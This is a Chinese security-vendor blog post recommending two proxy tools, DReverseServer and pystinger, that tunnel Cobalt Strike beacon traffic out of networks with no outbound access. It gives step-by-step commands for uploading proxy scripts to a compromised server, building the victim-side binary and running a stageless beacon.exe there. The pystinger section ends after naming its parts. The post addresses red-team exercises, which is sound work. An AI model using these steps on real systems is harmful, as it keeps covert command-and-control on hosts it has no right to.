工具推荐之不出网环境下上线CS

发布者：盛邦安全

发布于：2023-07-21 14:45

前言

在实战攻防演练中，我们经常会遇到目标不出网的情况，即便获取了目标权限也不方便在目标网络进行下一步横向移动。本期我们将会推荐两个常用的代理工具，使我们能在不出网的环境下让目标上线到CS，方便后渗透的工作。

工具1：DReverseServer

工具链接：

01cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6p5j5i4W2T1M7U0c8S2K9#2)9J5c8V1x3J5f1X3g2$3k6i4u0K6k6g2m8J5L8%4S2&6

工具原理：

利用代理转发将目标服务器上的CS的流量特征转发到CS服务端上，类似模拟一个木马在本地Listener进行上线。

官方使用说明：

1、将C2script目录下的对应文件，如proxy.ashx 以及C2ReverseServer上传到目标服务器。

2、使用C2ReverseServer建立监听端口：

./C2ReverseServer (默认为64535)

3、修改C2script目录下对应文件的PORT，与C2ReverseServer监听的端口一致。

4、本地或C2服务器上运行C2ReverseClint工具

./C2ReverseClint -t C2IP:C2ListenerPort -u a38K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5j5h3#2H3L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3M7X3!0^5P5g2)9J5k6i4m8Z5M7l9`.`. (传送到目标服务器上的proxy.php路径)

5、使用CobaltStrike建立本地Listener(127.0.0.1 64535)端口与C2ReverseServer建立的端口对应

6、使用建立的Listner生成可执行文件beacon.exe传至目标服务器运行

7、可以看到CobaltStrike上线。

DReverseServer复现步骤

1、放置脚本文件到目标服务器

2、编译服务端程序

在cmd命令行输入 CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build DReverseServer.go完成受害者端应用程序编译。

3、编译CS端程序

在cmd命令行输入CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build DReverseClint.go完成CS端应用程序编译。

4、生成stagerless木马

Staged 和 Stageless 的区别在于Staged实际功能只是程序执行后和C2 建立连接并接收真正的shellcode,然后加载执行(这里服务器不出网所以导致无法正常建立连接)；而 Stageless 直接省去了接收 Payload 的步骤。

5、目标客户端监听

6、CS端监听

7、等待上线

8、注意事项

a) 本地复现php脚本需打开socket选项。

b) 建议用户对CS的jar文件中的/resources/default.profile进行修改，将sleeptime值修改1000以下，这样CS生存的木马上线就不用默认等待60秒。

工具2：pystinger

工具链接：

064K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6r3N6h3&6F1P5g2N6G2L8r3k6Q4x3V1k6H3P5i4y4@1K9h3&6Y4k6i4u0Q4x3V1j5`.

工具原理：

利用内网反向代理转发将目标服务器上的木马上线与连接、操作流量特征通过HTTP协议方式转发至C2服务端，使其目标在不出网情况下上线MSF、viper、CS。

官方使用说明：

详见61dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6r3N6h3&6F1P5g2N6G2L8r3k6Q4x3V1k6H3P5i4y4@1K9h3&6Y4k6i4u0Q4x3V1k6T1L8r3!0T1i4K6u0r3L8h3q4K6N6r3g2J5i4K6u0r3M7X3g2S2k6r3#2W2i4K6g2X3j5$3&6Q4x3X3g2E0k6l9`.`.

pystinger复现步骤

工具可分为2块内容：

1、stinger_server程序+proxy脚本。

2、stinger_client程序+木马程序